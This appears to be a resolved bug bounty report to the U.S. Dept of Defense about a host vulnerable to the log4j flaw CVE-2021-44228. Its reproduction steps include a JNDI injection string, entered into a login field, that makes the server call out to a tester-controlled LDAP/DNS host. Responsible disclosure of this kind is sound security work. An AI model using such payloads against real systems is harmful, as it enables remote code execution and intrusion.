██████████ running a vulnerable log4j
Critical
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
alex_gaynor
Vulnerability Details
Technical details and impact analysis
**Description:**
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
## Impact
Probably arbitrary code execution
## System Host(s)
████████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-44228
## Steps to Reproduce
1. Browse to https://████████/███████https%3A%2F%2F█████████%2F
2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field
3. Enter a random password
4. Submit
Observe that a request was made to your DNS server. This strongly suggests a vulnerable log4j.
## Suggested Mitigation/Remediation Actions
Update log4j or disable jndi support.
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2021-44228
UNKNOWN
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from …
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Use of Externally-Controlled Format String